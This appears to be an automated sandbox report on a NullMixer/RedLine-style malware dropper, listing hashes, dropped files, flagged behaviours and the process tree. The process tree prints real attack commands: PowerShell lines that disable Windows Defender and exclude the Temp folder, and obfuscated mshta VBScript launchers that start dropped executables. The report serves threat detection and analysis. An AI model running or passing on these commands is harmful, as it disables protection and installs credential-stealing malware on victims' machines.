| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2892-75-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1724-79-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2552-81-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2404-89-0x0000000000300000-0x0000000000308000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8.exe
| MD5 | 360e4cdd67c04428d4a9b9b59d352584 |
| SHA1 | de633409edc357f21da340992cbb035350001254 |
| SHA256 | 01a005463e33fb90c1b77e0fcee36f5e7856fe6868313df3c1fe123fe4c1e1a8 |
| SHA512 | e0c9056943d7e70f5e506696ce9b0236d083fe6cb08fb7511355fac380da3b56fad552789053d58de06b5e980fd38319b865be962b09e1d3f2f46a84ef177084 |
\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
| MD5 | f7f7ab4f0a4d1c8d127a1c6bb4c0ea6e |
| SHA1 | d7462d88f1fb9904fe3f1e937e2ebc0809607f8a |
| SHA256 | f564d99d0ce406b1ca653ad2d3c40d6d4c6d9304729fd47a22bb6157be6294a6 |
| SHA512 | 95e156b95132d6a7df5c15ba7f7d0b6d683a16e46c83716090a83a4cf1016f5a9e45ec45026f05287f55596bd669fac5b1873d89779795011ff7bd4484aab7e2 |
\Users\Admin\AppData\Local\Temp\nstF2F.tmp\System.dll
| MD5 | fbe295e5a1acfbd0a6271898f885fe6a |
| SHA1 | d6d205922e61635472efb13c2bb92c9ac6cb96da |
| SHA256 | a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1 |
| SHA512 | 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06 |
\Users\Admin\AppData\Local\Temp\nstF2F.tmp\INetC.dll
| MD5 | 2b342079303895c50af8040a91f30f71 |
| SHA1 | b11335e1cb8356d9c337cb89fe81d669a69de17e |
| SHA256 | 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f |
| SHA512 | 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47 |
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
| MD5 | 89d1bd67214042bde02749afdc91b85f |
| SHA1 | bd3b9b45fecb02a8d38a3f2dab7de14a3e4f8ea4 |
| SHA256 | 4672ca322e9d03b30223452f9d9be6e78d957ef47fc046fc60a1fffc1edad1e0 |
| SHA512 | bacf183ae91cd2f8521f5ff376a2f004b2222738b5ffe2c69d623b33266186ccc7036fb255591af1d3b7f1003376950486e42cb1dc202a60ffd597a7227a15ad |
memory/1540-140-0x0000000001100000-0x0000000001108000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Jonba.exe
| MD5 | 3434b3e59d0dc8d25ff3e83ced5d6f87 |
| SHA1 | 1cfc6af2e22fc55e8bcbce2cbe0ea572cff11d8f |
| SHA256 | f2201a75165335d71b3f303fb46db6b8e6e160cba924bc02b2409da5c8c83b40 |
| SHA512 | 6f7850598937f930a6732a1e713ebe47cc716fe9e32a68623378c8143c57da1f51f4af97f6886bce3f48b8a04b0bd540839eee23ca0926f6bf44c2f5af12980a |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\WcWfz1Tn.MJ
| MD5 | e1caa9cc3b8bd60f12093059981f3679 |
| SHA1 | f35d8b851dc0222ae8294b28bd7dee339cc0589b |
| SHA256 | 254b6e6f43b2707ac107664b163ba074051b0534aafa8faf85a1760299182565 |
| SHA512 | 23f3fa616c1a96acd9a781d833a69ac37a9989dc5605396ecde41beae971b287bc963ea8020c56d92034e7e284c37639280650e1674864707ba859ad5815cdfa |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\1w8lBDVH.aou
| MD5 | 112b8c9fa0419875f26ca7b592155f2b |
| SHA1 | 0b407062b6e843801282c2dc0c3749f697a67300 |
| SHA256 | 95ae984c19dbf91919296efb398aaf700605910a28abe9288c7639c7d9223202 |
| SHA512 | a71e187dbc18c2d7cd21b1e856ee7d58e230b801758ed6a2205e8dacdc8235a09111014cff3171ea82e8942251508ada57eefdbcbc13daddbfbe30eddc29dad8 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\MyBa.V
| MD5 | 51424c68f5ff16380b95f917c7b78703 |
| SHA1 | 70aa922f08680c02918c765daf8d0469e5cd9e50 |
| SHA256 | 065f5b48408abb0260d68775e6db36136c8ac2bd7c8a1168613cc5cb8825d315 |
| SHA512 | c7510a9555402d64665bcbce661eb54c1bcbb20095c084036d8af625de9d0bf93cb33e93cbc9b6efbc73f9080ef7052dcbc35fb8d44ccf56fb2db8af933e06af |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\9Bu~.w
| MD5 | 8b4e06aede42785b01c3cdf3f0883da6 |
| SHA1 | 664fdc12cb0141ffd68b289eaaf70ae4c5163a5a |
| SHA256 | 8a8d67872f0bc6e6669f7396a84b879d12882ea495467b09b6613edfc4108c42 |
| SHA512 | 7b6a20e41365c546f1aa5a84964b36fc4cedd194754d1f09cfdadf822f4141d037067811ca62a7d2da23ec1e332943cb828d4f771308fdfa79327cb3fb6f2c82 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\hKS2IU.1Q
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
memory/1860-212-0x00000000028E0000-0x00000000038E0000-memory.dmp
memory/2772-213-0x0000000000400000-0x0000000002F74000-memory.dmp
memory/2892-214-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1880-215-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1860-217-0x00000000028E0000-0x00000000038E0000-memory.dmp
memory/2216-223-0x0000000000110000-0x0000000000330000-memory.dmp
memory/2216-224-0x000000001B360000-0x000000001B580000-memory.dmp
memory/1860-225-0x000000002D360000-0x000000002D406000-memory.dmp
memory/1860-229-0x000000002D410000-0x000000002D4A3000-memory.dmp
memory/1860-226-0x000000002D410000-0x000000002D4A3000-memory.dmp
memory/1860-239-0x000000002D410000-0x000000002D4A3000-memory.dmp
memory/1860-240-0x000000002D4B0000-0x000000002E316000-memory.dmp
memory/1860-241-0x000000002E320000-0x000000002E3AD000-memory.dmp
memory/1860-242-0x000000002E3B0000-0x000000002E438000-memory.dmp
memory/1860-243-0x000000002E3B0000-0x000000002E438000-memory.dmp
memory/1860-245-0x000000002E3B0000-0x000000002E438000-memory.dmp
memory/1860-246-0x0000000000090000-0x0000000000093000-memory.dmp
memory/1860-247-0x00000000000A0000-0x00000000000A5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 816520bddbb9cd95a5904ba5c6626989 |
| SHA1 | d6aca0489429c82eab0f5e213f1ca93648a36eb2 |
| SHA256 | 8877b12798309300f6f18ac44e2c4770076c152b5ba36f17b8bf94338adc178a |
| SHA512 | 2db4fb133d24d8cd8905c42e8affab1efd322efa740ba8381de4a0f610a2492a78dfc42761d85d7df13334938da7ddd0fe95a6066ff3d40f03c2f71f2f5660c3 |
memory/2656-262-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-260-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-270-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-276-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-274-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-272-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-268-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-266-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-264-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1620-307-0x0000000001C60000-0x0000000001C66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\f78be40.exe
| MD5 | a014b8961283f1e07d7f31ecdd7db62f |
| SHA1 | 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065 |
| SHA256 | 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89 |
| SHA512 | bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869 |
memory/2220-321-0x0000000000A80000-0x0000000000A88000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
10s
Max time network
150s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3824 set thread context of 1064 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe
"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe
Sat0663b341399ee.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe
Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe
Sat0647140c100d63.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe
Sat0619212f22dd7.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe
Sat0618d93ac2c5c.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe
Sat06ebc37d1c94352.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe
Sat06f5ed0e3bb24.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat060fd7e42d2.exe
Sat060fd7e42d2.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe
Sat0675f75df01bdb.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3952 -ip 3952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1428 -ip 1428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1028 -ip 1028
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 360
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """"== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 840
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\cmd.exe
